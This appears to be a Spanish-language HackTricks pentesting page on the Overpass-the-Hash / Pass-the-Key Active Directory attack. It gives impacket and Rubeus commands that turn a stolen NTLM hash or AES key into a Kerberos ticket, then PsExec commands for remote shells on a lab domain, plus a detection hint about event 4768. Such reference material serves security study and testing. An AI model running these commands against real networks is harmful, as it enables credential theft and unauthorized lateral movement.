hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

3.8 KiB
Raw Blame History

Overpass The Hash/Pass The Key (PTK)

Este ataque tiene como objetivo utilizar el hash NTLM del usuario o las claves AES para solicitar tickets Kerberos, como alternativa al común Pass The Hash sobre el protocolo NTLM. Por lo tanto, esto podría ser especialmente útil en redes donde el protocolo NTLM está deshabilitado y solo se permite Kerberos como protocolo de autenticación.

Para llevar a cabo este ataque, se necesita el hash NTLM (o la contraseña) de la cuenta de usuario objetivo. Por lo tanto, una vez que se obtiene el hash del usuario, se puede solicitar un TGT para esa cuenta. Finalmente, es posible acceder a cualquier servicio o máquina donde la cuenta de usuario tenga permisos.

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

Puedes especificar -aesKey [clave AES] para usar AES256.
También puedes usar el ticket con otras herramientas como smbexec.py o wmiexec.py.

Posibles problemas:

  • PyAsn1Error(NamedTypes can cast only scalar values,) : Se resuelve actualizando impacket a la última versión.
  • KDC no puede encontrar el nombre : Se resuelve usando el nombre del host en lugar de la dirección IP, ya que no es reconocido por Kerberos KDC.
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

Este tipo de ataque es similar a Pass the Key, pero en lugar de usar hashes para solicitar un ticket, el ticket en sí es robado y utilizado para autenticarse como su propietario.

{% hint style="warning" %} Cuando se solicita un TGT, se genera el evento 4768: Se solicitó un ticket de autenticación Kerberos (TGT). Puede verse en la salida anterior que el tipo de clave es RC4-HMAC (0x17), pero el tipo predeterminado para Windows es ahora AES256 (0x12). {% endhint %}

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Referencias

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥